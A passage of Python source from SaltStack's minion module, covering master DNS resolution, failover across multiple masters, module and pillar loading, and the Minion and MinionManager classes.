zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.dictupdate
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str) and \
not isinstance(opts['master'], list):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string or a list'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
resolve_dns_fallback = opts.get('resolve_dns_fallback', False)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
opts['master_uri_list'] = list()
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(1)
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
except SaltClientError as exc:
last_exc = exc
msg = ('Master hostname: \'{0}\' not found. Trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
msg = ('No master could be reached or all masters '
'denied the minions connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(1)
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
# Ensure that a pillar key is set in the opts, otherwise the loader
# will pack a newly-generated empty dict as the __pillar__ dunder, and
# the fact that we compile the pillar below won't matter as it won't be
# packed into any of the modules/functions processed by the loader.
# Below, when pillar data is compiled, we will update this dict with
# the compiled pillar data.
self.opts['pillar'] = {}
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
compiled_pillar = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
funcs=self.functions,
rend=self.rend,
).compile_pillar()
# Update the existing (empty) pillar dict with the compiled pillar
# data. This ensures that the __pillar__ dunder packed into all of the
# functions processed by the loader is not empty.
try:
self.opts['pillar'].update(compiled_pillar)
except TypeError:
log.warning(
'Compiled Pillar data %s is not a dictionary',
compiled_pillar
)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if self.opts['master_type'] == 'failover' or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons()
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler()
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(minion.opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(minion.opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
def reload(self):
for minion in self.minions:
minion.reload()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = jid_queue
self.periodic_callbacks = {}
if io_loop is None:
if HAS_ZMQ:
zmq.eventloop.ioloop.install()
self.io_loop = LOOP_CLASS.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
log.info('Creating minion process manager')
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, async=True)
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
def reload(self):
log.info('Minion reloading config')
disk_opts = salt.config.minion_config(os.path.join(salt.syspaths.CONFIG_DIR, 'minion')) # FIXME POC
self.opts = salt.utils.dictupdate.merge_overwrite(self.opts, disk_opts)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
